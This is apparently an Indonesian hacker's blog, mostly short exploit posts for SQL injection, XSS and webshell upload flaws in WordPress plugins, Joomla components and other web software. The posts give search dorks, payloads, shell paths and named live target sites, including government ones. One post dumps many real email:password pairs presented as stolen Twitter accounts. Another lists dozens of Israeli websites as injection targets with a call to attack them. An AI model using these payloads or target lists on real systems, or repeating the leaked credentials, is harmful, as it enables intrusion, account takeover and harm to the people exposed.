./ X'1N73CT

permintaaan maaf terbuka untuk IBT ( indonesian Backtrack team )

untuk admin dan seluruh member IBT ( Indonesian Backtrack Team )

saya selaku salah satu admin IFC ( indonesian Fighter Cyber ) mewakili 7 admin lainya.
dengan ini saya meminta maaf kepada admin ataupun member IBT ( Indonesian Backtrack Team )
karena ketidak sengajaan kami atas kesamaan logo IFC ( http://i.imgur.com/lQbfl.png ) dan IBT ( http://indonesianbacktrack.or.id/forum/ )
dan kami akan segera memperbarui logo kami

mari kita maju bersama demi keutuhan NKRI di dunia cyber, walaupun di indonesia mempunyai banyak grup hacking ataupun cyber dan berbagai perbedaan yang ada, tapi kita mempunyai 1 tujuan yang sama yaitu " ingin memajukan Indonesia khususnya di dunia cyber "

"jangan pernah terpecah walaupun perbadaan yang kita punya, kita bisa berdiri karena perbedan, NKRI bisa berdiri karena perbedaan" dan tetaplah pada semboyan bangsa kita "Bhinneka Tunggal Ika"

salam dari saya

x'1n73ct

[ Read more ... ]

Bug XSS di website "australian federal police"

Exploit 0 Comments »

[ type attack ]
xss injection

[ web vuln ]
http://www.afp.gov.au/Search.aspx?searchTerm=

[ script injection ]
"<script>alert('hey admin this web vuln XSS by X 1n73ct')</script>

[ demo ]

http://www.afp.gov.au/

[ Read more ... ]

Bug SQL Injection di "Imagine virtual design"

Exploit 0 Comments »

[ type attack ]
SQL Injection

[ dork ]
intext:"Design by imagine virtual" inurl:".php?id="

[ demo ]

http://www.incasadesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

[ details ]
inj3ct0r

[ Read more ... ]

Bug file upload di "PDW File Browser"

Exploit 0 Comments »

[ type attack ]
temper data

[ dork ]
inurl:"pdw_file_browser"

intext:Upload a new file intitle:PDW File Browser v1.3


intitle:Index of /pdw_file_browser/ intext:Parent Directory

[ shell location ]
site.com/pdw_file_browser/img/yourshell.php.jpg
site.com/pdw_file_browser/img/yourshell.php

[ demo ]
http://dudleycil.org.uk/pdw_file_browser/

[ detail ]
inj3ct0r

[ Read more ... ]

Bug Sql Injection di Joomla Component "com_jooproperty"

Exploit 0 Comments »

[ type attack ]
Sql Injection

[ dork ]
inurl:option=com_jooproperty product_id=

[ demo ]
http://www.litsabaldaquin.com/short_term_rental/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1'

[ Read more ... ]

Bug sql injection di KeenLook developer

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork
Powered By KeenLook inurl:catalogue.php?page=

[ demo ]

http://www.naskasports.com/catalogue.php?page=42'

http://www.lebord.com/catalogue.php?page=2'

http://www.cordial-zulco.com/catalogue.php?cid=2'

[ details ]

[ Read more ... ]

Bug sql injectin di "Espacio Ecuador"

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork ]
intext:"developed by Espacio Ecuador" inurl:id=

[ demo ]
http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25

[ details ]
http://cxsecurity.com/issue/WLB-2012110228

[ Read more ... ]

Bug sql njection di "Seventeen Design"

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork ]
intext:"Producido por: Seventeen Design." inurl:id=

[ demo ]
http://www.monteavila.gob.ve/mae/detail_new.php?id=147'

[ details ]
http://cxsecurity.com/issue/WLB-2012110225

[ Read more ... ]

Bug file Upload in " Joomla Component com_smartformer"

Exploit 0 Comments »

[ type attack ]
tamper data

[ dork ]
inurl:index.php?option=com_smartformer inurl:itemid= intext:Upload

[ demo ]
http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en
http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90

[ shell location ]
site/components/com_smartformer/files/yournameshell.php

[ details ]
http://1337day.com/exploit/19825

[ Read more ... ]

Bug sql injection di plugins "WordPress st_newsletter"

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork ]
allinurl:stnl_iframe.php?newsletter=

[ demo ]
http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=7

[ Read more ... ]

Bug sql injection di plugins "WordPress wp-imagezoon"

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork ]
allinurl:wp-imagezoom/zoom.php?id=

[ demo ]
http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=GnAaX

[ Read more ... ]

Bug sql injection in "Wordpress dailyedition-mouss Theme"

Exploit 0 Comments »

[ type attack ]
SQL injection

[ dork ]
inurl:fiche-artiste.php?id=

inurl:themes/dailyedition-mouss/fiche-artiste.php?id=

[ demo ]
http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=383

[ Read more ... ]

bug file upload di plugins "WordPress Zarzadzanie Kontem" ( ajax file manager )

Exploit 0 Comments »

lansung saja kita lihat POC nya
[ type attack ]
tamper data

[ dork ]
inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager

[ demo ]
http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3
http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=5

[ Read more ... ]

Bug sqli di wordpress Plugin "plg_novana"

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork ]
inurl:novana_detail.php?**id=

[ exploit ]
/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql]

[ demo ]

http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--

[ detail ]
http://1337day.com/exploit/19787

[ Read more ... ]

bug sql injection di "girl.php"

Exploit 0 Comments »

[ type attack ]
sql injection

[ dork ]
inurl:girl.php?id=

[ demo ]
http://www.btsfashionshow.com/girl.php?id=6
http://www.aramis-london-escorts.com/girl.php?id=301
http://www.pornescort.xxx/girl.php?id=68 <== wajib di hancurkan ^_^

[ Read more ... ]

10.000 + twiter account

Exploit 0 Comments »

langsung saja
goyaa2004@yahoo.co.in:tirumala
vipinbe@yahoo.co.in:september24
pinak956@rediffmail.com:wrinky
gajanan_543@rediffmail.com:gan543
soundrenjith@yahoo.com:683557
kuldiptiku@gmail.com:familyno1
clairefairy1@hotmail.com:truelove
sajita.amuthan@gmail.com:rapcce2k
ashk143@yahoo.com:ashkanuj
suriconsult@gmail.com:laundry
msarwar_rao@yahoo.com:sarfraz1400
nasir007ng@yahoo.com:kluxklan
rajeshmalaviya2008@gmail.com:69717484
abdemurshad@yahoo.com:kazim825
rajakumari_naidu@yahoo.com:bhb8551
cliffabhms@gmail.com:clifford
robn@inco.com.lb:LRFJrteP
rajeevkumartomar@yahoo.com:neelamm
tamfab@live.com:faithope
okeflex360@yahoo.com:DOCTOR88timi0301
debmedina@prodigy.net.mx:deby1234
satinsethi@yahoo.co.in:zolo2008
thakurvijayk@gmail.com:9415691033
seerit@yahoo.com:training
tropixentertainment@hotmail.com:village
manojin24@yahoo.com:sigmund
javaidnaqvi05@gmail.com:vespa1978
salamhamid@hotmail.com:mahahamid10
freehealing@gmail.com:hrs1959
shahjahan1663@yahoo.co.in:mumtaazz
prasanna.dhal1963@gmail.com:prasanna1963
pra_bob@sify.com:thanety
soonverysoon@hotmail.com:mohammad
sathiya8@yahoo.com:hayagrivar8
majumdarnk@gmail.com:up70h7078
siddiqitm@yahoo.co.in:rukhsana
zafarhusain2000@yahoo.com:fazli44
azam.mahmood@live.com:muhammad
ravi_rx_dr@yahoo.com:poojalove
rahul1191986@rediff.com:1191986
stanthedog@talktalk.net:nettle22
zoedarling2@hotmail.co.uk:thinair1
berenice527@hotmail.com:fiftytwo
shashimodi@hotmail.com:shashiagarwala
dryogaravi@yahoo.com:yoga7780
bharath.bhai@yahoo.com:101981
jtikari@gmail.com:intel1224
parmindersharma18@gmail.com:bittubunty
mmaegraith@aol.com:patr1ckm
gabrielpaezza@yahoo.com:sophie1809
vpskohli@gmail.com:winkie90
tanyacrous@mweb.co.za:alphabet
paulabryden@gmail.com:2$ho3s
lalichan552@gmail.com:chenakalayil1945
sanneo2009@gmail.com:sarika1974
doctor_khan2007@yahoo.com:balouch12345
anmaadhavan@rediffmail.com:annathur
alok8700@gmail.com:nc423ap
drakmittra@gmail.com:ellamittra
hands4nrg@aol.com:reiki1
barbarasymington@hotmail.com:vallarta
contact@lizroe-french.co.uk:saffron15
deschepperron@skynet.be:robi4552
jjmunari@bluewin.ch:biotech
mansoorta@hotmail.com:shaista
leenganming07@yahoo.com.hk:e7202850
sat8pan@gmail.com:pandeg
ru_karim@hotmail.com:r_712127

jika ane posting pasti panjang nanti mending download file saya disini

[ Read more ... ]

Bug file upload di "wordpress Plugin tdo-mini-forms"

Exploit 0 Comments »

[ type attack ]
tamper data

[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload

[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg

[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg

[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

[ details ]
http://1337day.com/exploit/19776

[ Read more ... ]

Bug sql injection di web israel

Exploit 0 Comments »

ini bukan saatnya kita untuk diam dan duduk manis,
ketika saudara-saudara kita di palestina sedang dalam gempuran negara zionis israel
ketika warga sipil dan anak-anak menjadi korban

peta palestina 1946 - 2000 ( bagaimana dengan peta negara berdirinya masjidil aqsa itu )

save palestine

inurl:index.php?m_id= site:il
inurl:*.php?m_id= site:il

http://www.ntzn.co.il/indexe.php?m_id=6
http://www.nirosta.co.il/index.php?m_id=50
http://www.dsbeng.co.il/index.php?m_id=10
http://www.asho.co.il/index.php?m_id=24
http://www.san.co.il/index.php?m_id=6
http://www.aurora.co.il/index.php?m_id=15
http://www.oci.co.il/index.php?m_id=3
http://www.naftalironen.co.il/index.php?m_id=13
http://www.shilo.co.il/index.php?m_id=27
http://en.govrin.co.il/index.php?m_id=48
http://www.h-e.co.il/index.php?m_id=38
http://www.hanitzra.co.il/index.php?m_id=13
http://www.electrochlor.co.il/index.php?m_id=21
http://en.atelier-arch.co.il/index.php?m_id=8
http://www.dahan.co.il/index.php?m_id=6
http://www.mshilo.co.il/index.php?m_id=19
http://www.stentofon.co.il/index.php?m_id=4
http://www.san.co.il/index.php?m_id=6
http://www.meiami.co.il/mei/index.php?m_id=30
http://www.asho.co.il/index.php?m_id=24
http://www.yaadyarok.co.il/index.php?m_id=9
http://www.shakul10.co.il/index.php?m_id=1
http://www.nhar.co.il/index.php?m_id=8
http://www.campus-hanamal.co.il/index.php?m_id=26
http://www.videodesign.co.il/index.php?m_id=8
http://www.mera.co.il/index.php?m_id=14
http://www.i-arc.co.il/index.php?m_id=3
http://www.hoolda.co.il/index.php?m_id=10
http://www.b-meir.co.il/index.php?m_id=11
http://www.superfile.co.il/index.php?m_id=15
http://www.shikmona.co.il/index.php?m_id=4
http://www.mksheli.co.il/index.php?m_id=8
http://www.sharonsberlo.co.il/index.php?m_id=3
http://www.polycart.co.il/index.php?m_id=2
http://www.ronen-arc.co.il/index.php?m_id=15
http://www.moked007.co.il/index.php?m_id=6
http://www.easyvac.co.il/index.php?m_id=3
http://www.klingeram.co.il/index.php?m_id=5
http://www.lahav-arc.co.il/index.php?m_id=3
http://www.hoolda.co.il/index.php?m_id=20
http://www.asho.co.il/index.php?m_id=19
http://www.yuvalalon.co.il/index.php?m_id=117
http://www.sharonsberlo.co.il/index.php?m_id=4
http://www.sharonpaz.co.il/center/index.php?m_id=100
http://www.taloptica.co.il/index.php?m_id=4
http://www.arsew.co.il/indexe.php?m_id=9
http://www.asif-bag.co.il/indexe.php?m_id=28
http://www.fueltech.co.il/indexe.php?m_id=28
http://www.simtec.co.il/indexe.php?m_id=28
http://www.reflex-in.co.il/index.php?m_id=28
http://www.heart-dharma.org.il/angel/share.php?id=28
http://www.yasam.co.il/item_h.php?id=234
http://www.jewishhistory.org.il/history.php?id=5874
http://www.aaci.org.il/articlenav.php?id=43
http://www.innernet.org.il/printArticle.php?id=174
http://schulich.technion.ac.il/faculty_member.php?id=31
http://www.ginothair.org.il/content.php?id=282
http://resq.co.il/news/news_details.php?id=46
http://www.printmaking.co.il/artists.php?id=47
http://www.maataf.co.il/index2.php?id=1
http://www.t3.technion.ac.il/more_details.php?id=249
http://brml.technion.ac.il/show_project.php?id=8

===[ Teamr00t | Anonymous | IFC | all Indonesian Hacker | Gaza Hacker ]====

[ Read more ... ]

Bug file upload di "jQuery-FileUpload"

Exploit 0 Comments »

langsung saja ya

[ type attack ]
tamper data

[ dork ]
intitle:upload intext:Add files.. "Start upload" Cancel upload Delete

[ vuln ]
http://konceptsigngroup.com/jQuery-FileUpload/index.html

[ demo ]
http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim.jpg

[ Read more ... ]

Bug File Upload "Plugins Spotlight" di Wordpress

Exploit 0 Comments »

terlepas dari masalah akun facebook saya yang di tendang sama facebook kali ini saya hadir membawa exploit baru :)

[ type attack ]
tamper data & shell upload

[ dork ]
intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/"

inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully.

inurl:wp-content/plugins/spotlightyour/

[ exploit ]
http://site/wp-content/plugins/spotlightyour/monetize/upload/

[ shell access ]
wp-content/uploads/[year]/[month]/[search your shell].php

[ example ]
http://pure-cashmere-pashmina-scarves.com/wp-content/plugins/spotlightyour/monetize/upload/

[ Read more ... ]

pengumuman [ saya off dari facebook ]

maaf kawan2 bagi temen2 saya yang ada di facebook saya minta maaf

karena akun fb saya tidak aktif gara2 di tendang sama facebook pusat saya sudah tidak bisa masuk lagi di akun x'inject
saya tidak tau mengapa saya selalu di tendang sama facebook, apa mungkin saya "buronan" xixixixixi ^_^
saya akan terus buat akun lagi walaupun sampai part 100 selama itu gratis
jangan bosan2 add saya

tolong sebarkan berita ini di akun saya agar teman2 yang lain mengetahui bahwa saya sudah tidak bisa masuk lagi di akun x'inject

saya sementara akan off dr facebook, tolong bagi sahabat2 saya yg mnjadikan saya admin segera keluarkan akun saya yang x'inject dari grup agar tidak ada hal2 yang tidak di inginkan

sementara saya akan aktif di forum2 yang saya naungi n blog saya ini

terimakasih atas perhatianya

salam dari saya

x'1n73ct

[ Read more ... ]

Bug file upload di " TinyBrowser "

Exploit 0 Comments »

hehehe ini sebenarnya hasil dork yang saya kembangkan dari laporan di inj3ct0r
langsung saja

[ exploit ]

[ type attack ]
tamper data

[ new dork ]
inurl:tinybrowser/upload.php

intitle:Index of / intext:Parent Directory "tinybrowser/"

inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php

inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload

inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser :: Upload

[ demo ]
http://www.maspa.com.br/clientes/lj/admin/js/tiny_mce/plugins/tinybrowser/upload.php

[ example ]
http://www.maspa.com.br/uploads/images/_thumbs/_anonymous_muslims.jpg

[ details ]
http://1337day.com/exploit/19732

[ Read more ... ]

Bug file upload in Joomla "com_autostand"

Exploit 0 Comments »

langsung saja kita lihat exploitnya :)

[ type attack ]
tamperdata

[ dork ]
inurl:index.php?option=** func=newItem intext:Select Image Add a Car

inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin

inurl:index.php?option=com_autostand

[ poc ]
site/inurl:index.php?option=com_autostand&func=newItem

[ demo ]
http://www.karahan.be//index.php?option=com_autostand&func=newItem

[ Read more ... ]

Bug sql injection di " like.php "

Exploit 0 Comments »

kali ini saya akan posting tentang bug sql injection di like.php langsung saja cekidot :)

[ type attack ]
sql injection

[ dork ]
inurl:like.php?id= intext:LikeItNow Script © 2010

[ demo ]
http://neonapster.net23.net/like.php?id=34%27

[ Read more ... ]

WELCOME

SELAMAT DATANG DI BLOG SAYA BY X'1N73CT

[ Read more ... ]